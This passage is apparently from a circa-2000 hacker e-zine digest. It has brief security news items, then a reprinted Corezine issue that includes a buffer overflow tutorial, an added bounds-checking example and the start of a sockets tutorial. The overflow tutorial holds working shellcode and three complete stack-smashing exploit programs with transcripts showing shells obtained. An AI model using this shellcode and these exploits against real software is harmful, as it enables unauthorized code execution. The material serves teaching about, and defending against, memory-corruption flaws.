contributed by ps
The Internet Crime Sector of the Sao Paulo Police in Brazil has questioned JxLxMx in connection with attacks on various web sites. Both JxLxMx and JZ, who was identified last week, will most likely be prosecuted for damages, crime against the honor of various authorities and fraudulent use of telecommunication systems, under article 10 of the law 926/96.

IDG News Brazil - Portuguese
http://www.uol.com.br/idgnow/inet/inet2000-03-30d.shl

----------

@HWA

152.0 HNN:Mar 31st:China Sets Up security Test Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
In an effort to test security problems related to hardware, database systems, application software systems and network equipment and related systems, The National Information Security Testing Evaluation and Certification Center has established a new branch, the Computer Testing Evaluation Center, in Beijing.

AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID

----------

Error
The Reason: CID$B$N@_Dj$,4V0c$C$F$$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$$(B

nifty huh?

@HWA

153.0 HNN:Mar 31st:Hackers Probe Physical Security of MIT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
The Massachusetts Institute of Technology, where the word hacker was coined, is a physical maze of underground steam tunnels and hidden passageways. Hackers traverse these passageways almost on a nightly basis looking for new challenges.
The Boston Globe
http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml

----------

See ISN story

@HWA

154.0 HNN:Mar 31st:DVD for Linux is Now Legal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brad
It was only a matter of time. After all the brouhaha over DeCSS someone has finally created a legal DVD player for the Linux platform. LinDVD has been created and will be marketed by Intervideo for $29.95 and will be available this spring.

Wired
Intervideo
http://www.wired.com/news/business/0,1367,35311,00.html
http://www.intervideo.com

----------

Legal DVD for Penguin-Heads
by Michelle Finley
3:00 a.m. Mar. 31, 2000 PST

"Woo-hoo! No more double-boot disks!" yelled Linux user Joe CapoBianco, in reaction to InterVideo's announcement that it will soon release a software DVD player/decoder for the Linux operating system.

Although there is some support for DVD on Linux, some of the open source operating system's users set up their machines to run both Linux and Windows in order to watch DVD movies and play games.

The lack of DVD support for Linux has come to the forefront lately, pushing some developers to come up with solutions that included an unauthorized DVD decoder for Linux, which resulted in lawsuits filed by the DVD industry.

InterVideo has a long-standing Content Scrambling System (CSS) license, enabling it to produce and market DVD player/decoder software without violating copyright or other laws.

InterVideo sales and marketing head Joe Monastiero says the Linux platform presents a variety of opportunities for the company to expand its existing technology base, including DVD software.

"Of notable interest is the set-top environment; however, even the PC space has enough interest in Linux to make our development worthwhile," he said.
"Additionally, as should be obvious based on the reports generated by Wired News a few months ago regarding DVD and Linux, the reason why the CSS hack was done for the Linux community is because traditional Windows multimedia developers writing Linux code are not exactly plentiful."

The product, dubbed LinDVD, will allow users to play back DVD movies, interactive DVD titles, MPEG video content, and Video CDs on PCs that are equipped with a DVD drive without the need for a hardware decoder card.

The decoder/player includes integrated MPEG1 and MPEG2 file playback, a powerful VCD 2.0 player, and SVCD playback. A full multi-channel Dolby Digital (TM) audio decoder will be included.

LinDVD will be available late spring and will be priced at $29.95. If "someone writes a multichannel audio driver for their Linux sound card," Monastiero said, "the multichannel version would be $49.95 and would support full 5.1 output."

In keeping with the spirit of open source ethics, Monastiero says that InterVideo is looking at ways to open up as much of the product as possible to the OS community.

"Certainly, there will be an [application programming interface] published to create unique user experiences and [user interfaces]," he said. "We are also looking at ways to help developers port drivers to our code.

"But the CSS, Dolby, and navigation code will definitely not be open source. We're doing this to add a legal player to the market that the DVD industry can also be happy with."

"This is another exciting day for the Linux community," said Linus Torvalds, creator of the Linux operating system. "[Linux] continues to attract industry-leading software companies like InterVideo. Their digital video and audio products will greatly enhance the Linux multimedia experience."
@HWA

155.0 HNN:Mar 31st:Y2K Survivalists Come Out of Hiding
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Fearing the end of the world, nuclear holocaust, and other terrible calamities a Japanese man traveled to extremely remote parts of Australia. He believed the world would be plunged into chaos as it entered the new millennium. The man traveled to the Willare Bridge roadhouse 2334km north of Perth. He arrived carrying a SAS basic remote survival book, a gas mask, dehydrated food items, a canteen, water purifying tablets and camping gear. He had tried to enter the country with a flak jacket and a blow gun but those were confiscated by customs officials.

Fairfax IT
http://www.it.fairfax.com.au/breaking/20000330/A39581-2000Mar30.html

----------

Japanese tourist survives Y2K test hiccup
14:40 Thursday 30 March 2000
AAP

STAFF at a remote outback roadhouse in Western Australia revealed today how a Japanese tourist turned up on their doorstep equipped with a flak jacket and gas mask, fearing the Y2K bug would trigger a nuclear explosion.

The terrified tourist had travelled to Australia, believing the world would be plunged into chaos as it entered the new millennium.

Customs officials revealed yesterday how they stopped the man at immigration carrying a survival kit, a blow gun and a chemical warfare outfit.

And in the latest development in the incredible saga, outback residents told today how the man feared Armageddon had arrived, when a routine generator check on New Year's Eve caused a blackout.

Lisa Williams, who works at the Willare Bridge roadhouse 2334km north of Perth, said the man "freaked out'' when the generators cut out at about 10pm on 31 December, resulting in a four-minute power blackout.

"He was running around going 'Y2K, Y2K', he was really panic-stricken,'' Williams said.

She said the man's English was poor and nobody was able to make him understand what was happening.
It was not until roadhouse manager Graeme McNamara telephoned a Japanese interpreter in Broome, who then spoke to the terrified tourist, that he calmed down.

"She explained to him that no bombs were going to be falling and that there wasn't going to be a nuclear holocaust, it was just the generators being changed,'' Williams said.

He told them he believed the millennium bug would trigger a nuclear explosion and he planned to head for the outback because he thought it would be the safest place to be.

When he arrived in Australia, his flak jacket and the blow gun and darts, illegal in Australia, were confiscated by customs officials, it emerged yesterday.

But the man was allowed to enter the country with the other items, which included an SAS basic remote survival book, a gas mask, dehydrated food, an army style water container, water purifying tablets and camping gear.

Williams said she had tried to show the man the roadhouse's computer console was still working after the power was restored to reassure him that the millennium bug had not eventuated.

"I was pointing to the computer and trying to explain to him but he was still in a state about it until he spoke to the interpreter,'' she said.

Roadhouse co-manager Sheree Marich said the man, dressed in army-style camouflage gear, had arrived at the roadhouse earlier that afternoon by taxi from Broome, a 165km trip for which he paid about $300.

"I didn't understand why the taxi driver had dropped him off to us at first,'' Marich said. "I actually thought he was a bit of a callous bastard who'd taken his money and dumped him in the middle of nowhere.''

She said it was only later that she learned that the man had researched the area and had asked to be taken there because of its remoteness.

The man left Australia, content that the world had not come to an end, after enjoying a restful holiday.
@HWA

156.0 CoreZine: New zine by lamagra of b0f
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by: Ed

Site:  http://corezine.seKure.de/
Owner: lamagra

This zine first came out in July of 1999; three issues have been released at the url above with a fourth in the works. Sadly you won't see it or any further releases, as lamagra has decided not to continue the project. I highly recommend that you grab these while you can lest they disappear off the net; they contain high quality tech papers but proved to be too much work for one guy. Lack of advertising and a good plan also contributed to the demise of this zine, and little or no response therefore materialized from a would-be audience. The first issue is included here as an example of the quality of this zine. Check it out and grab the others while you can. - Ed

----------------[ Personal

Handle:          lamagra
Call him:        lamagra, lama, lam
Past handles:    access-granted
Handle origin:   Blade (the movie)
Date of Birth:   28-12-1981
Height:          185 cm
Weight:          uhmm, dunno
Eye color:       green-gray
Hair Color:      blonde
Computers:       i586 (120 Mhz) & i486 & i486 (laptop)
Admin of:        UNAH16, my network
Sites Frequented: www.securityfocus.com
URLs:            http://bounce.to/unah16
Email:           access-granted@geocities.com

----------------[ Favorite Things

Women:     hmmm, yeah
Cars:      cabrios
Foods:     all
Music:     Hard-Core
Computers: yeah
Movies:    all action and horror and *yeah*
Comics:    no
Books:     scientific books
Magazines: corezine, b4b0
TV:        friends
Quotes:    join the army, meet interesting people, kill them
People:    peter, bea, an, psionic, A grue, grimknight, etc.

Misc:
Turn Ons:  belly button piercing
Turn Offs: ignorance

lamagra can be found on EFnet in #b0f ...

COREZINE - faq
~~~~~~~~~~~~~~~~~

FAQ:

Q: Why did i start corezine?
A: Mainly because i want to help spread the knowledge. I like to get into new things, but sometimes there's just no info about it anywhere. Then you'll have to look at the source (read: linux kernel), but this is way over the heads of some people.
Nobody likes to look in that big piece of code, so they'll just say "nah, nevermind. I'll go do something else". Basically i want to save people from all this trouble. If you need help, mail me. Don't waste time in lame channels on IRC packed with people who don't want to help or can't help (#coders, #linux).

COREZINE - sample issue
~~~~~~~~~~~~~~~~~~~~~~~

First release July 1999

[ Corezine ASCII-art banner ]

------[ Corezine volume 01 - July 1999

Corezine #01
==================

--------[ info

This is the first release of our brand new ezine. Since it's the first one, it's not really fantastic. We put it together in a week. But next time (i promise) it'll be huge and fantastic. By then i hope to have finished my "ultimate backdoor", which i will release then. Psionic is working on a new and bigger tutor on installing linux. Everyone should have linux or BSD.

We hope to get a lot of readermail and other responses. You can mail us at . If you want to encrypt your mail, i've added a PGP-key at the bottom of this text. REMEMBER: Big Brother is watching.

BTW: i've added extract.c to easily extract the programs included in this ezine. I didn't make it myself, you could say i ripped it from phrack. But it's not, i just have a lot of stuff to do. The program uses the <++> and <--> tags, they aren't part of the texts or programs.

--------[ table of contents

1. introduction by corestaff
2. worldnews by peak
3. guide on bufferoverflows by lamagra
4. tutorial on sockets by xphantom
5. guide on file permissions by lamagra
6. an introduction to perl by darkmo0n
7. art of backdoors by meb
8. tutorial on installing linux by psionic
9. hyperterminal trick in windows by burntash
10. an introduction to C by psylence
11.
a guide on finding holes (in addition to the first text)

--------[ Warez

extract.c: see above          Phrack
lkm.tgz: my kernel module     lamagra

Corestaff signing off.

<++> corezine.pgp
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQGiBDeUjooRBAD/e8RiD1lNRhol32QTse2+fDad6r6IzWK01VSvaOOIwqgjAwPD
BShcGR2wU3kQ/Y/yT+aW1tmkVThG1k56jryrifu8P6s5EwoRMuFAjmXx9S4s7Px9
EpD7QJ6e8Ha8nX5oMkzo4lwVg6iJeXBpEsv0fi4JosvfbOvY3A82VGsAvwCg/82F
SdZ643ctQpeMpX/LelsR7CMEAJ05F/nwDej7orSdqae5OcAXCcW9TbqcLAbOzQZZ
QvnZePPN6QvCgc/X5bnGuU42YaY883b4jps3fnyMVWe5qR0UHqDq5zxBy1xyEq3I
ip4q2sLqwiReCTI+eBt7fAjaUlLTtdS/cEQMy5ERQhZWr+Q8ZxELzSjky7eVuciG
ZNK7A/sFbZVVfpgT0edCyOPkhsIuxctcQENLZ8kRy2S1I68388dN5hVLGtPXn1b+
QfbwtQBX/sowyU0bkR9PQy6I1K8GvhX49Wo+q0ZXRIjt92oU4ioqnRpsc5buRMUc
z5UjGTSxTIgIWiYFSdLOSTmNAAQvrj1sjWpm9tSuHA2YBBtErrQGdW5haDE2iQBL
BBARAgALBQI3lI6KBAsDAQIACgkQ+xtU4W2kapHbWQCbBbg8mc5PCZE1Z5HPEoO/
la29WnMAoLryW301F92f526TkE6iQSFO/X1OuQENBDeUjqkQBADHnvWOGb1qX8dV
YIGuZJGtAJLHvx1VNMM/C786eHLtl+MwHDl0OpJEIKM7cfT/lQmlmGuMTXvthlP/
qLaALC6G3StdVmRwqU+sXzpe97OPps5xsOS2bxESqgZYO7g6IwPQE31/xe0Qfzmz
uikuamnJF6YtOlD1qrFoaGvIggpYZwACAgP+IiVjaYBvckuHDI73gd1kC+D+aS2C
JQKQ1IxUxwJzOqw3ExVP0qDEJL1WpASB4FYe2QRHEDIHLn1Xn8RC0KnbZmbTE0sP
IJqjCENY2i2T+l0NNc0UCsjlzcv6xLt+JpDUI/9NpFFEfioZuUIAMDkoIaoVCgkw
r1zN67AlbaV0REKJAD8DBRg3lI6p+xtU4W2kapERAryEAJ97NQp4ANiB7uh3Ine3
MchIHoPSowCfWM6n0+bnd7njmGvOg+KdOQxtcQI=
=xS9u
-----END PGP PUBLIC KEY BLOCK-----
<-->

-----------------------[ BUFFEROVERFLOWS by Lamagra

<++> buffer/example.c
#include <string.h>

int main(void)
{
    char big_string[100];
    char small_string[50];

    memset(big_string, 0x41, 100);      /* fill with 'A' */
    /* strcpy(char *to, char *from) */
    strcpy(small_string, big_string);   /* 100 bytes into a 50-byte buffer */
    return 0;
}
<--> end of example.c

The program creates two strings; memset() fills big_string with char 0x41 (= A). Then it copies big_string into small_string. As we all see, small_string can't hold 100 chars and a bufferoverflow follows.
Let's take a look at the memory:

[ big_string ] [ small_string ] [SFP] [RET]

During the bufferoverflow the SFP (Stack Frame Pointer) and the RET will be overwritten by A's. This means that the RET will now be 0x41414141 (0x41 is the hex value of A). When the function returns, the IP will be replaced by the overwritten RET. Then the computer will try to execute the instruction at 0x41414141. This will result in a segmentation violation because this address is outside the process space.

--------------------[ Exploitation

Now that we know we can change the flow of the program by overwriting the RET, we can try to exploit it. Instead of overwriting with A's, we could overwrite it with a specific address.

------------[ Execution of arbitrary code

Now we need something to point the address to and execute. In most cases we'll just spawn a shell, although this is not the only thing we can do.

Before:

FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF

B = the buffer
E = stack frame pointer
R = return address
F = other data

After:

FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF

S = shellcode
A = address pointing to the shellcode
F = other data

The code to spawn a shell in C looks like this:

<++> buffer/shell.c
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = 0x0;
    execve(name[0], name, 0x0);
    exit(0);
}
<--> end of shellcode

I'm not going to explain how to produce shellcode because this will require a lot of knowledge in ASM. It's a long and boring process that we don't need to get into because there is more than enough shellcode available. For those who want to learn how to make it:

- compile the program above using the -static flag
- open it up in gdb, use the "disassemble main" command
- take out all the unnecessary code
- change and rewrite it, this time in ASM
- compile, open it up in gdb and use the "disassemble main" command
- use the x/bx command on the addresses of the instructions and retrieve the hex-code.
XXXXXXXXXXX
X WAKE UP X
XXXXXXXXXXX

Or you can just take this code:

char shellcode[]=
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

------------[ Finding the address

When we try to overflow a buffer of another program, the problem is finding the address of the buffer. The answer to this problem is that for every program the stack starts at the same address. Therefore, by knowing where the stack starts we can try to guess the address of the buffer. This program will give us its stack pointer:

<++> buffer/getsp.c
#include <stdio.h>

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(void)
{
    fprintf(stdout, "0x%lx\n", get_sp());
    return 0;
}
<--> end of getsp.c

------------[ Trying to exploit an example

We're going to try to exploit this program:

<++> buffer/hole.c
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc > 1)                /* otherwise we crash our little program */
        strcpy(buffer, argv[1]); /* no length check on argv[1] */
    return 0;
}
<--> end of hole.c

<++> buffer/exploit1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 512

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize  = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* fill the whole buffer with the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* then drop the shellcode in after the first address */
    ptr += 4;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    memcpy(buff, "BUF=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit1.c

Now we
can try to guess the offset (bufferaddress = stackpointer + offset).

[bubbles]$ exploit1 600
Using address: 0xbffff6c3
[bubbles]$ ./hole $BUF
[bubbles]$ exploit1 600 100
Using address: 0xbffffce6
[bubbles]$ ./hole $BUF
segmentation fault

etc. etc.

As you see this process is nearly impossible; we have to guess the exact address of the buffer. To increase our chances, we can pad NOPs before the shellcode in our overflow buffer. The NOP instruction does nothing and simply passes execution on to the next instruction. We use it because then we don't need to guess the exact address of the buffer: if the overwritten return address points anywhere inside the NOP string, execution slides through the NOPs until it reaches our code. The memory should look like this:

FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF

N = NOP
S = shellcode
A = address pointing to the shellcode
F = other data

We rewrite our old exploit.

<++> buffer/exploit2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 512
#define NOP                 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize  = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* fill the whole buffer with the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* first half becomes NOPs, shellcode sits in the middle */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;

    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    memcpy(buff, "BUF=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit2.c

[bubbles]$ exploit2 600
Using address: 0xbffff6c3
[bubbles]$ ./hole $BUF
segmentation
fault
[bubbles]$ exploit2 600 100
Using address: 0xbffffce6
[bubbles]$ ./hole $BUF
#exit
[bubbles]$

To improve our exploit even more, we could place the shellcode inside an environment variable. Then we could overflow the buffer with the address of this variable. This method will increase our chances even more. We modify our code so it uses the setenv() call to put the shellcode in the environment.

<++> buffer/exploit3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE    2048
#define NOP                 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i, eggsize = DEFAULT_EGG_SIZE;

    if (argc > 1) bsize   = atoi(argv[1]);
    if (argc > 2) offset  = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_esp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* RET buffer: nothing but the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* egg: NOPs followed by the shellcode, placed in the environment */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;

    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    memcpy(egg, "BUF=", 4);
    putenv(egg);
    memcpy(buff, "RET=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit3.c

[bubbles]$ exploit2 600
Using address: 0xbffff5d7
[bubbles]$ ./hole $RET
#exit
[bubbles]$

--------------------[ Finding bufferoverflows

There is really only one way to find bufferoverflows, and that is by reading the source.
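hole.c above is overflowed because strcpy() copies argv[1] with no length check. As an added example (editor's code, not from corezine), here is the bounded counterpart of that copy, which refuses the oversized input instead of writing past the buffer, together with a small source-audit helper that counts calls to the unchecked library functions lamagra lists (strcpy, strcat, sprintf, vsprintf, scanf, plus gets). The hole_c sample it scans is a constructed copy of the vulnerable program's text; the function names bounded_copy and count_unchecked_calls are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of hole.c's strcpy(): copy src into dst only when it
 * fits, terminator included. Returns 0 on success, -1 when it would overflow.
 * memchr() is bounded by dstsize, so an oversized src is never read past the
 * first dstsize bytes either. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    const char *nul = memchr(src, '\0', dstsize);
    if (nul == NULL)                 /* no terminator within dstsize bytes */
        return -1;
    size_t n = (size_t)(nul - src);  /* n + 1 <= dstsize, includes the NUL */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Library calls that perform no boundary checking (lamagra's list, plus gets). */
static const char *unchecked_funcs[] = {
    "strcpy", "strcat", "sprintf", "vsprintf", "scanf", "gets", NULL
};

/* Source-audit helper: count calls to the functions above in C source text.
 * A hit is the bare name followed by '(' and not preceded by an identifier
 * character, so strncpy( and vsprintf( are not counted as strcpy( or sprintf(. */
int count_unchecked_calls(const char *src)
{
    int hits = 0;
    for (int f = 0; unchecked_funcs[f] != NULL; f++) {
        const char *name = unchecked_funcs[f];
        size_t len = strlen(name);
        const char *p = src;
        while ((p = strstr(p, name)) != NULL) {
            int boundary = (p == src) ||
                           !(isalnum((unsigned char)p[-1]) || p[-1] == '_');
            const char *after = p + len;
            while (*after == ' ' || *after == '\t')
                after++;
            if (boundary && *after == '(')
                hits++;
            p += len;
        }
    }
    return hits;
}

/* Constructed sample: the text of hole.c as a string, for the audit helper. */
static const char hole_c[] =
    "int main(int argc, char *argv[])\n"
    "{\n"
    "    char buffer[512];\n"
    "    if (argc > 1)\n"
    "        strcpy(buffer, argv[1]);\n"
    "    return 0;\n"
    "}\n";

int main(void)
{
    char buffer[512];
    char attempt[600];              /* same 600-byte input the exploit runs use */
    memset(attempt, 'A', sizeof attempt - 1);
    attempt[sizeof attempt - 1] = '\0';

    printf("600-byte input into 512-byte buffer: %s\n",
           bounded_copy(buffer, sizeof buffer, attempt) == 0 ? "copied" : "rejected");
    printf("unchecked calls found in hole.c: %d\n", count_unchecked_calls(hole_c));
    return 0;
}
```

The audit helper is deliberately simple (no comment or string stripping); it is the grep you run first over a source tree, and each hit is then read by hand, which is exactly the method the text recommends.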
Since Linux is an open-source system, it will be easy to obtain the source of the programs. Long live open-source.

Look for library functions that don't perform boundary checking like:

strcpy(), strcat(), sprintf(), vsprintf(), scanf().

Other dangerous ones are:

- getc() and getchar() put in a while loop.
- misuse of strncat.

--------------------[ Other references

Smashing the stack for fun and profit by aleph1
bufferoverflows by mudge

--------------------[ Ending

Well, that about wraps it up. I hope you learned something and enjoyed reading this guide. I enjoyed writing it. If you have any further questions, remarks or anything, you can find me on IRC (irc.box5.net) in some channel.

--------------------[ EOF

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
The *beginners* guide to sockets in C
By: xphantom
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

So, you want to connect to other computers from within your own programs you say? You can't find any info on the net to teach you how to do so? You have no idea what man pages to look up? You can't find/afford any books? Well, you came to the right place. In this paper I hope to give a jump start into programming your own Internet applications in C.

This paper does assume at least *some* familiarity with C and its syntax, and also that you are using some form of UNIX or Linux (from now on referred to as *nix). Although large parts of programming sockets in *nix are the same as in Windows, there are some differences which I won't get into (because I don't program in windows ;)). It should also be noted that all code contained in this paper was written and compiled on a Red Hat 5.2 system using glibc 2.0.7 and libc 5.3.12 and it all compiled fine.

Now, let's get on with the show shall we.
To a programmer, sockets are very similar to a low level file descriptor (you can even use the read() and write() functions with your sockets), although creating the socket itself is more involved than opening, reading and writing to files due to the additional complexity of creating a network connection compared to reading and writing from your own hard drive.

For most socket use, you will need a client/server pair. The server's job is to listen on a specified port and perform some action when it receives a request from the client, while the client's job (obviously) is to "ask" the server to perform whatever task(s) it was programmed to do.

We won't be using *every* socket type function in this paper since it is a beginner's tutorial, but there will be enough information to get you up and running and (hopefully) having some fun. With that said, let's make some sockets.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Creating a socket with: socket()

The first thing you need to do to write your socket program is (of course) create a socket, using the socket() function:

-------
#include <sys/types.h>
#include <sys/socket.h>

int socket(int af, int type, int protocol)
------

'int af' is the address family or domain the socket is part of. The two most common are:

AF_UNIX - Used for interprocess communication on a single machine.
AF_INET - Used for interprocess communication on the same, or different systems using the DARPA protocols (UDP/TCP/IP).

'int type' is what type of connection you'll be using; the two most common are:

SOCK_STREAM - Used for connection oriented sockets, guaranteed data delivery, or an error will be received by the sender.
SOCK_DGRAM - Used for connectionless sockets, data delivery not guaranteed.

In this paper we will focus on family AF_INET and type SOCK_STREAM.

'int protocol' A protocol value of 0 is very common. This permits the system to choose the first protocol which is permitted with the pair of values specified for family and type.
On success, a file descriptor is returned; on failure -1 is returned and errno is set accordingly.

E.G:

------
#include <sys/types.h>
#include <sys/socket.h>

int sockfd; /* soon to be socket file descriptor */

sockfd = socket(AF_INET, SOCK_STREAM, 0);
/* error checking here */
------

And if all goes well, we now have a socket file descriptor that we can use across the Internet (AF_INET) using a connection based protocol (SOCK_STREAM). Remember, the protocol (0) is automatically set for us.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Giving your socket a name using: bind()

Ok, now we have our socket created. The next thing is we need to do something with it. Let's try giving it a name using bind():

------
#include <sys/types.h>
#include <sys/socket.h>

int bind(int sockfd, struct sockaddr *name, int namelen)
------

In a call to bind(), sockfd is the file descriptor for the socket, obtained from the call to socket(). Name is a pointer to a structure of type sockaddr. If the address family is AF_UNIX (as specified when the socket is created), the structure is defined as follows:

------
struct sockaddr {
    u_short sa_family;
    char    sa_data[14];
};
------

name.sa_family should be AF_UNIX. name.sa_data should contain up to 14 bytes of a file name which will be assigned to the socket. namelen gives the actual length of name, that is, the length of the initialized contents of the data structure.

E.G:

------
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

struct sockaddr name;
int sockfd;

name.sa_family = AF_UNIX;
strcpy(name.sa_data, "/tmp/whatever");   /* 13 chars + NUL fits sa_data[14] */
sockfd = socket(AF_UNIX, SOCK_STREAM, 0);
/* error checking code here */
bind(sockfd, &name, strlen(name.sa_data) + sizeof(name.sa_family));
/* error checking code here */
------

error checking note: on success bind() returns 0, on failure bind() returns -1 and sets errno accordingly.
Now, in a call to bind using AF_INET we could use a different structure:

-----
struct sockaddr_in {
    short int          sin_family;  /* Address family */
    unsigned short int sin_port;    /* Port number */
    struct in_addr     sin_addr;    /* Internet address */
    unsigned char      sin_zero[8]; /* Same size as struct sockaddr */
};
------

This is a bit bigger and more involved but isn't too hard at all. Let's look at an example:

------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

int sockfd, port = 23;
struct sockaddr_in my_addr;

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("Socket Error, %d\n", errno);
    exit(1);
}

my_addr.sin_family = AF_INET;                  /* host byte order */
my_addr.sin_port = htons(port);                /* see man htons for more information */
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);   /* get our address */
bzero(&(my_addr.sin_zero), 8);                 /* zero out the rest of the space */

if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
    printf("Bind Error, %d\n", errno);
    close(sockfd);
    exit(1);
}
------

There you go: if all went well, our socket now has a name, and if all didn't go well, the error was reported and the program exited.

A few small notes - if all your program does is connect to other computers, you don't need to use the bind() function at all (although it won't hurt anything). The line:

my_addr.sin_port = htons(port);

can be automated to get its own port by just setting the port to 0, good for client programs, bad for server programs as you don't know what port it's using.

Now we have a socket, it's named, but it still doesn't do anything, that's not good... let's see if we can connect to another computer.
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Remote connections using: connect()

